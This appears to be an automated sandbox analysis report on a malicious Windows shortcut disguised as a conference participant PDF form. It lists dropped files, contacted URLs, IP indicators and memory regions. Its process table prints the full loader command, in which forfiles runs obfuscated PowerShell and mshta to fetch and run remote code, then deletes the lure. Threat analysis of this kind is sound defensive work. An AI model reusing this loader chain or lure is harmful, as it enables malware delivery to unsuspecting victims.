Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
T15hf0Y3mp.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command
line arguments, Icon number=13, Archive, ctime=Sat May 7 04:20:19 2022, mtime=Fri Oct 4 14:00:18 2024, atime=Sat May 7
04:20:19 2022, length=41472, window=hidenormalshowminimized
|
initial sample
|
||
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0xfd7f282c, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\awdr_pro[1].js
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\by_onsales[1].css
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\color[1].css
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\error[1]
|
HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\front[1].css
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\select_radio_check[1].css
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\site_main[1].js
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\switcher[1].css
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\awdr-dynamic-price[1].js
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\classic-themes.min[1].css
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\error[1]
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\flatsome-shop[1].css
|
Unicode text, UTF-8 text, with very long lines (24156)
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\front[1].css
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\label[1].css
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\radio[1].css
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\styles[1].css
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\by_instock[1].css
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\chosen.min[1].css
|
ASCII text, with very long lines (372)
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\customize-table[1].css
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\gtm4wp-contact-form-7-tracker[1].js
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\husky[1].js
|
C++ source, ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\quick_search[1].css
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\switcher[1].css
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\warning[1]
|
GIF image data, version 89a, 36 x 38
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\awdr_style[1].css
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\by_author[1].css
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\checkbox[1].css
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\flatsome[1].css
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\front[1].css
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\jquery.min[1].js
|
ASCII text, with very long lines (65447)
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\tooltip[1].css
|
ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mku24xam.rdi.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x4cjefny.qes.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 30 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\forfiles.exe
|
"C:\Windows\System32\forfiles.exe" /p C:\ /m Windows /c "powershell . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2;$eCRg
= Get-Location;$eCRg = Join-Path $eCRg 'GIE Annual Conference 2024 in Munich Participant Form Event Agency.pdf.lnk';del $eCRg
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
. \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2;$eCRg = Get-Location;$eCRg = Join-Path $eCRg
'GIE Annual Conference 2024 in Munich Participant Form Event Agency.pdf.lnk';del $eCRg
|
||
C:\Windows\System32\mshta.exe
|
"C:\Windows\System32\mshta.exe" https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://gurt.duna.ua/programy-nauczania/GIEA
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2
|
185.68.16.189
|
||
https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7
|
185.68.16.189
|
||
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/select_radio_check/css/html_types/select_radio_check.css?ver=1.3.4.2
|
185.68.16.189
|
||
https://gurt.duna.ua/my-account/lost-password/
|
unknown
|
||
https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=12
|
unknown
|
||
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.17.57KJd
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2.css
|
unknown
|
||
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff?v=3.17.5)
|
unknown
|
||
https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=1a392523165907adee6aR
|
unknown
|
||
https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=1DSC:
|
unknown
|
||
https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2Ar
|
unknown
|
||
https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2a
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=2.3.8
|
185.68.16.189
|
||
https://gurt.duna.ua/dohovir-oferty/
|
unknown
|
||
https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2C:
|
unknown
|
||
https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2i
|
unknown
|
||
https://g.live.com/odclientsettings/Prod.C:
|
unknown
|
||
https://gurt.duna.ua/ru/optovaia-prodazha-duna/
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-contact-form-7-tracker.js?ver=1.13.1
|
185.68.16.189
|
||
https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2w
|
unknown
|
||
https://gurt.duna.ua/help/
|
unknown
|
||
https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=1P
|
unknown
|
||
https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=1
|
185.68.16.189
|
||
https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2s
|
unknown
|
||
https://gurt.duna.ua/wp-content/uploads/xostanni-zamovlennia-280x280.png.pagespeed.ic.y9zgyMzY4v.png
|
unknown
|
||
https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-180x180.jpg.pagespeed.ic.5J2kHsZjY5.jpg
|
unknown
|
||
https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.1-shop.css?ver=3.17.5
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/img/plus.svg
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=5.6
|
unknown
|
||
https://gurt.duna.ua/wp-admin/admin-ajax.php
|
unknown
|
||
https://gurt.duna.ua/my-account/orders/
|
unknown
|
||
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.ttf?v=3.17.5)
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
|
unknown
|
||
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.57
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/slideout/js/jquery.tabSlideO
|
unknown
|
||
https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/chunk.tooltips.js?ver=3.17.5
|
unknown
|
||
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5;
|
unknown
|
||
https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=1F
|
unknown
|
||
https://gurt.duna.ua/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
|
unknown
|
||
https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFUkUzdYPFkaVNA6w.woff)
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/img/delete.png);background-size:
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/tooltip.c
|
unknown
|
||
https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.1%
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/radio.css?ver=1.3.4.2
|
185.68.16.189
|
||
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.svg?v=3.17.5#fl-icons)
|
unknown
|
||
http://crl.ver)
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_onsales/js/by_onsales.js?
|
unknown
|
||
https://gurt.duna.ua/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_onsales/css/by_onsales.cs
|
unknown
|
||
https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-192x192.jpg.pagespeed.ic.EwuWeIzKab.jpg
|
unknown
|
||
https://schema.org
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7js=
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/ion.range-slider/js/ion.range
|
unknown
|
||
https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.12
|
unknown
|
||
https://gurt.duna.ua/cart/
|
unknown
|
||
http://gmpg.org/xfn/11
|
unknown
|
||
https://gurt.duna.ua/wp-content/uploads/xzamovlennia-280x280.png.pagespeed.ic.nWjuhwsWVe.png
|
unknown
|
||
https://gurt.duna.ua/wp-content/uploads/xdopomoha-280x280.png.pagespeed.ic.YLuKJA07kn.png
|
unknown
|
||
https://gurt.duna.ua/wp-json/
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7C:
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_instock/css/by_instock.css?ver=1.3.4.2
|
185.68.16.189
|
||
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5C:
|
unknown
|
||
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.17.5
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/slideout/css/slideout.css?ve
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/label/js/html_types/label.js
|
unknown
|
||
https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFWkUzdYPFkaVNA6w.woff)
|
unknown
|
||
https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFWUUzdYPFkaVNA6w.woff)
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_instock/css/by_instock.cs
|
unknown
|
||
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot#iefix?v=3.17.5)
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/html_types/select.js?ver=1.3.
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/tooltip.css?ver=1.3.4.2
|
185.68.16.189
|
||
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2y
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/front.js?ver=1.3.4.2
|
unknown
|
||
https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-32x32.jpg.pagespeed.ic.O2d9531Kcm.jpg
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7b
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/switcher.css?ver=1.3.4.2tx
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_author/css/by_author.css?ver=1.3.4.2
|
185.68.16.189
|
||
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.17.5);
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/js/front.js?v
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=5.6.2
|
unknown
|
||
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5?ver=2.3.73.8
|
unknown
|
||
https://yoast.com/wordpress/plugins/seo/
|
unknown
|
||
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5
|
185.68.16.189
|
||
https://gurt.duna.ua/my-account/
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2
|
185.68.16.189
|
||
https://www.morkva.co.ua?utm_source=client-site&utm_medium=client-footer-link
|
unknown
|
||
https://gurt.duna.ua/comments/feed/
|
unknown
|
||
https://gurt.duna.ua/order-table/
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8C:
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/html_types/radio.js?ver=1.3.4
|
unknown
|
||
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/color.css?ver=1.3.4.2
|
185.68.16.189
|
||
https://gurt.duna.ua/programy-nauczania/GIEAnnualConferenceStage2?6
|
unknown
|
There are 90 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
gurt.duna.ua
|
185.68.16.189
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
185.68.16.189
|
gurt.duna.ua
|
Ukraine
|
||
127.0.0.1
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
2266D17D000
|
heap
|
page read and write
|
||
22601D34000
|
trusted library allocation
|
page read and write
|
||
1840C7F7000
|
heap
|
page read and write
|
||
18407ACA000
|
heap
|
page read and write
|
||
6F5694C000
|
trusted library allocation
|
page read and write
|
||
18407B61000
|
heap
|
page read and write
|
||
1FF7031A000
|
heap
|
page read and write
|
||
77A03FE000
|
stack
|
page read and write
|
||
184078AE000
|
heap
|
page read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
184078B0000
|
heap
|
page read and write
|
||
184078A8000
|
heap
|
page read and write
|
||
77A19FC000
|
stack
|
page read and write
|
||
226019EC000
|
trusted library allocation
|
page read and write
|
||
2266AF14000
|
heap
|
page read and write
|
||
2266CCB0000
|
heap
|
page execute and read and write
|
||
184073F0000
|
trusted library allocation
|
page read and write
|
||
18407796000
|
heap
|
page read and write
|
||
1840C6F0000
|
trusted library allocation
|
page read and write
|
||
77A01F7000
|
stack
|
page read and write
|
||
7FFD9B942000
|
trusted library allocation
|
page read and write
|
||
1FF74E60000
|
trusted library allocation
|
page read and write
|
||
1840743C000
|
trusted library allocation
|
page read and write
|
||
1FF75053000
|
heap
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
18407A2A000
|
heap
|
page read and write
|
||
18407DA4000
|
trusted library allocation
|
page read and write
|
||
2266AEC6000
|
heap
|
page read and write
|
||
1FF7504C000
|
heap
|
page read and write
|
||
184078C9000
|
heap
|
page read and write
|
||
1840788D000
|
heap
|
page read and write
|
||
18407AA5000
|
heap
|
page read and write
|
||
1FF6FA8D000
|
heap
|
page read and write
|
||
18407AB9000
|
heap
|
page read and write
|
||
7FFD9B77B000
|
trusted library allocation
|
page read and write
|
||
18407AD0000
|
heap
|
page read and write
|
||
22601701000
|
trusted library allocation
|
page read and write
|
||
1FF70215000
|
heap
|
page read and write
|
||
17C06E04000
|
heap
|
page read and write
|
||
1FF74F42000
|
trusted library allocation
|
page read and write
|
||
A48057E000
|
stack
|
page read and write
|
||
2266B080000
|
heap
|
page read and write
|
||
7DF4324C1000
|
trusted library allocation
|
page execute read
|
||
2266C950000
|
trusted library allocation
|
page read and write
|
||
18407ACC000
|
heap
|
page read and write
|
||
184077A8000
|
heap
|
page read and write
|
||
17C055C0000
|
heap
|
page read and write
|
||
184073F3000
|
trusted library allocation
|
page read and write
|
||
1FF75220000
|
remote allocation
|
page read and write
|
||
184077AA000
|
heap
|
page read and write
|
||
1FF74E81000
|
trusted library allocation
|
page read and write
|
||
2266D138000
|
heap
|
page read and write
|
||
1FF70300000
|
heap
|
page read and write
|
||
184078C9000
|
heap
|
page read and write
|
||
6F561FD000
|
stack
|
page read and write
|
||
6F5654E000
|
stack
|
page read and write
|
||
18407CF7000
|
trusted library allocation
|
page read and write
|
||
18407433000
|
trusted library allocation
|
page read and write
|
||
18407D10000
|
trusted library allocation
|
page read and write
|
||
1FF74F71000
|
trusted library allocation
|
page read and write
|
||
1840742C000
|
trusted library allocation
|
page read and write
|
||
184078B1000
|
heap
|
page read and write
|
||
184077C7000
|
heap
|
page read and write
|
||
17C06E21000
|
heap
|
page read and write
|
||
184077C7000
|
heap
|
page read and write
|
||
1FF750B6000
|
heap
|
page read and write
|
||
1FF75084000
|
heap
|
page read and write
|
||
18407945000
|
trusted library allocation
|
page read and write
|
||
77A0CFE000
|
unkown
|
page readonly
|
||
1FF74E88000
|
trusted library allocation
|
page read and write
|
||
17C057E0000
|
heap
|
page read and write
|
||
18407788000
|
heap
|
page read and write
|
||
A4801EE000
|
stack
|
page read and write
|
||
1FF75086000
|
heap
|
page read and write
|
||
1840C7B0000
|
trusted library allocation
|
page read and write
|
||
18407B2C000
|
heap
|
page read and write
|
||
7FFD9B76D000
|
trusted library allocation
|
page execute and read and write
|
||
18407418000
|
trusted library allocation
|
page read and write
|
||
18407E40000
|
trusted library allocation
|
page read and write
|
||
2266C870000
|
trusted library allocation
|
page read and write
|
||
18407889000
|
heap
|
page read and write
|
||
184078A8000
|
heap
|
page read and write
|
||
17C06F44000
|
heap
|
page read and write
|
||
18407885000
|
heap
|
page read and write
|
||
18407930000
|
trusted library allocation
|
page read and write
|
||
22601965000
|
trusted library allocation
|
page read and write
|
||
1FF74EB0000
|
trusted library allocation
|
page read and write
|
||
1840776D000
|
heap
|
page read and write
|
||
1DE6B508000
|
heap
|
page read and write
|
||
1FF6FA96000
|
heap
|
page read and write
|
||
18407710000
|
heap
|
page read and write
|
||
184077EF000
|
heap
|
page read and write
|
||
1840CBB0000
|
trusted library allocation
|
page read and write
|
||
6F55EFB000
|
stack
|
page read and write
|
||
77A1CFE000
|
unkown
|
page readonly
|
||
184079DE000
|
trusted library allocation
|
page read and write
|
||
1840CBC0000
|
trusted library allocation
|
page read and write
|
||
A4806FE000
|
stack
|
page read and write
|
||
18407590000
|
heap
|
page read and write
|
||
77A07FC000
|
stack
|
page read and write
|
||
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
6F562FE000
|
stack
|
page read and write
|
||
17C054B7000
|
trusted library allocation
|
page read and write
|
||
1840794E000
|
trusted library allocation
|
page read and write
|
||
17C05529000
|
heap
|
page read and write
|
||
1840C7BE000
|
heap
|
page read and write
|
||
184079F0000
|
heap
|
page read and write
|
||
17C054B0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
18407959000
|
trusted library allocation
|
page read and write
|
||
2266AF40000
|
heap
|
page read and write
|
||
1FF75113000
|
heap
|
page read and write
|
||
184078B4000
|
heap
|
page read and write
|
||
17C05536000
|
heap
|
page read and write
|
||
1840C7C1000
|
heap
|
page read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
1FF750C3000
|
heap
|
page read and write
|
||
17C054D0000
|
trusted library allocation
|
page read and write
|
||
17C05585000
|
heap
|
page read and write
|
||
184078CD000
|
heap
|
page read and write
|
||
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
184078BE000
|
heap
|
page read and write
|
||
1FF74E80000
|
trusted library allocation
|
page read and write
|
||
77A0BFB000
|
stack
|
page read and write
|
||
1FF74F11000
|
trusted library allocation
|
page read and write
|
||
18407932000
|
trusted library allocation
|
page read and write
|
||
1840771F000
|
heap
|
page read and write
|
||
A4804FD000
|
stack
|
page read and write
|
||
18407E38000
|
trusted library allocation
|
page read and write
|
||
18407996000
|
trusted library allocation
|
page read and write
|
||
18407E2A000
|
trusted library allocation
|
page read and write
|
||
1FF7031A000
|
heap
|
page read and write
|
||
184073E8000
|
trusted library allocation
|
page read and write
|
||
1FF74FB0000
|
trusted library allocation
|
page read and write
|
||
1FF74F3A000
|
trusted library allocation
|
page read and write
|
||
1FF709E0000
|
trusted library allocation
|
page read and write
|
||
1FF6FA00000
|
heap
|
page read and write
|
||
77A227E000
|
stack
|
page read and write
|
||
1DE6B480000
|
heap
|
page read and write
|
||
1FF6FB13000
|
heap
|
page read and write
|
||
1840789B000
|
heap
|
page read and write
|
||
18407A89000
|
heap
|
page read and write
|
||
6F560FE000
|
stack
|
page read and write
|
||
18407CDC000
|
trusted library allocation
|
page read and write
|
||
18407ACE000
|
heap
|
page read and write
|
||
18407834000
|
heap
|
page read and write
|
||
18407710000
|
remote allocation
|
page read and write
|
||
18407B61000
|
heap
|
page read and write
|
||
18407A4A000
|
heap
|
page read and write
|
||
2266C910000
|
heap
|
page read and write
|
||
18407A70000
|
heap
|
page read and write
|
||
184078B5000
|
heap
|
page read and write
|
||
18407A7B000
|
heap
|
page read and write
|
||
184077AA000
|
heap
|
page read and write
|
||
17C06E39000
|
heap
|
page read and write
|
||
184073AE000
|
trusted library allocation
|
page read and write
|
||
184078AE000
|
heap
|
page read and write
|
||
184077BD000
|
heap
|
page read and write
|
||
184078E3000
|
heap
|
page read and write
|
||
2266CC0F000
|
heap
|
page read and write
|
||
18407BEE000
|
heap
|
page read and write
|
||
1FF7500F000
|
heap
|
page read and write
|
||
184077EF000
|
heap
|
page read and write
|
||
1FF74F65000
|
trusted library allocation
|
page read and write
|
||
184077C1000
|
heap
|
page read and write
|
||
6F55CFB000
|
stack
|
page read and write
|
||
18407BEB000
|
heap
|
page read and write
|
||
6F5684E000
|
stack
|
page read and write
|
||
1840792D000
|
trusted library allocation
|
page read and write
|
||
6F563FD000
|
stack
|
page read and write
|
||
18407766000
|
heap
|
page read and write
|
||
1FF74EA0000
|
trusted library allocation
|
page read and write
|
||
18407A7E000
|
heap
|
page read and write
|
||
1FF76000000
|
heap
|
page read and write
|
||
184077F0000
|
heap
|
page read and write
|
||
2266CCD0000
|
heap
|
page execute and read and write
|
||
18407940000
|
trusted library allocation
|
page read and write
|
||
18407366000
|
trusted library allocation
|
page read and write
|
||
184077ED000
|
heap
|
page read and write
|
||
7FFD9B911000
|
trusted library allocation
|
page read and write
|
||
18407340000
|
heap
|
page read and write
|
||
184078B5000
|
heap
|
page read and write
|
||
18407AC3000
|
heap
|
page read and write
|
||
18407A6D000
|
heap
|
page read and write
|
||
1FF708B0000
|
trusted library section
|
page readonly
|
||
18407B4C000
|
heap
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
17C05518000
|
heap
|
page read and write
|
||
2266AE7E000
|
heap
|
page read and write
|
||
184079D0000
|
trusted library allocation
|
page read and write
|
||
2266C993000
|
heap
|
page read and write
|
||
18407A73000
|
heap
|
page read and write
|
||
184078A8000
|
heap
|
page read and write
|
||
18407B61000
|
heap
|
page read and write
|
||
17C06E36000
|
heap
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
18407594000
|
heap
|
page read and write
|
||
77A12FE000
|
unkown
|
page readonly
|
||
184078B6000
|
heap
|
page read and write
|
||
184078A7000
|
heap
|
page read and write
|
||
184077BD000
|
heap
|
page read and write
|
||
18407C10000
|
trusted library allocation
|
page read and write
|
||
18407E68000
|
trusted library allocation
|
page read and write
|
||
22610010000
|
trusted library allocation
|
page read and write
|
||
1840740F000
|
trusted library allocation
|
page read and write
|
||
1FF75000000
|
heap
|
page read and write
|
||
2266AF1F000
|
heap
|
page read and write
|
||
184078A8000
|
heap
|
page read and write
|
||
18407B38000
|
heap
|
page read and write
|
||
18407DF0000
|
heap
|
page read and write
|
||
A480AFE000
|
stack
|
page read and write
|
||
77A14FE000
|
unkown
|
page readonly
|
||
1FF7503F000
|
heap
|
page read and write
|
||
7FFD9B900000
|
trusted library allocation
|
page read and write
|
||
1FF6FB00000
|
heap
|
page read and write
|
||
77A13FE000
|
stack
|
page read and write
|
||
18407430000
|
trusted library allocation
|
page read and write
|
||
18407B38000
|
heap
|
page read and write
|
||
18407788000
|
heap
|
page read and write
|
||
1FF6FAB1000
|
heap
|
page read and write
|
||
77A11FE000
|
unkown
|
page readonly
|
||
18407E58000
|
trusted library allocation
|
page read and write
|
||
184078A8000
|
heap
|
page read and write
|
||
2266CBA7000
|
heap
|
page execute and read and write
|
||
18407A1F000
|
heap
|
page read and write
|
||
7DF4324A1000
|
trusted library allocation
|
page execute read
|
||
18407947000
|
trusted library allocation
|
page read and write
|
||
184078B6000
|
heap
|
page read and write
|
||
1FF750D6000
|
heap
|
page read and write
|
||
18407932000
|
trusted library allocation
